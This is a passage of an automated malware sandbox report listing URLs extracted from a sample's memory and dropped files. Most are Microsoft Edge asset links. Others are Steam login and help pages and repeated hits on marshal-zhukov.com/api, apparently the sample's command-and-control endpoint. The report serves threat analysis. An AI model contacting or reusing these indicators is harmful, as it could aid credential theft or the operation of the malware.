Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log0.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log0.8.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://gaana.com/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en
Source: 28d9ab8742.exe, 0000001A.00000003.2816962815.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2825204549.0000000000CC9000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952432072.0000000001858000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 00000023.00000003.3185493009.0000000000B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.8.dr String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: BKJKJEHJJDAKECBFCGID.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 28d9ab8742.exe, 00000023.00000002.3198976239.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://m.kugou.com/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://m.soundcloud.com/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://m.vk.com/
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 2f2cd048-c5bb-4d93-aa71-754329f45479.tmp.8.dr String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: 28d9ab8742.exe, 0000001F.00000003.2983520290.0000000001866000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2983572121.000000000186C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com
Source: 28d9ab8742.exe, 28d9ab8742.exe, 0000001A.00000003.2852160535.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2933549588.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2955633341.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3049054642.000000000185D000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.000000000185D000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966606369.000000000186B000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3054691396.0000000005E74000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2996603887.0000000001869000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965112143.0000000001866000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2998014477.0000000001869000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/
Source: 28d9ab8742.exe, 0000001F.00000003.3049054642.000000000185D000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.000000000185D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/(_
Source: 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/))TR
Source: 28d9ab8742.exe, 0000001F.00000003.3049054642.000000000185D000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.000000000185D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/0_5
Source: 28d9ab8742.exe, 0000001A.00000003.2955633341.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/2f
Source: 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/9
Source: 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2933549588.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/:f
Source: 28d9ab8742.exe, 28d9ab8742.exe, 0000001A.00000003.2852160535.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2902790072.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2955499601.00000000056E1000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2933363824.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2903279773.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2933549588.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2862304891.00000000056EF000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2890683941.00000000056F6000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2955633341.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875570125.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3049221274.0000000005E91000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2975382180.0000000005E95000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2952481863.000000000181C000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966606369.000000000186B000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3048670954.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.3032918607.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2996603887.0000000001869000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/api
Source: 28d9ab8742.exe, 0000001F.00000003.2975754539.000000000186B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/api##
Source: 28d9ab8742.exe, 0000001F.00000003.3048639273.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3054722669.0000000005E7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/api8
Source: 28d9ab8742.exe, 0000001A.00000003.2874980002.00000000056F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/api;
Source: 28d9ab8742.exe, 0000001A.00000003.2874980002.00000000056F3000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2878055507.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2890683941.00000000056F6000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2875456533.00000000056F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiCQYHoC
Source: 28d9ab8742.exe, 0000001F.00000003.3048670954.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000002.3051651389.00000000017C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiH:0
Source: 28d9ab8742.exe, 0000001A.00000003.2874980002.00000000056F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiN
Source: 28d9ab8742.exe, 0000001A.00000003.2955633341.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiQa
Source: 28d9ab8742.exe, 0000001F.00000003.2952481863.0000000001808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiile
Source: 28d9ab8742.exe, 0000001A.00000003.2955499601.00000000056E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apio
Source: 28d9ab8742.exe, 0000001A.00000003.2933549588.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2955633341.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apioa
Source: 28d9ab8742.exe, 0000001A.00000003.2862304891.00000000056EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/apiu
Source: 28d9ab8742.exe, 0000001A.00000003.2933549588.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2890768591.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/eiom
Source: 28d9ab8742.exe, 0000001A.00000003.2933549588.0000000000CC5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com/zf
Source: 28d9ab8742.exe, 0000001F.00000002.3051651389.00000000017C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://marshal-zhukov.com:443/api
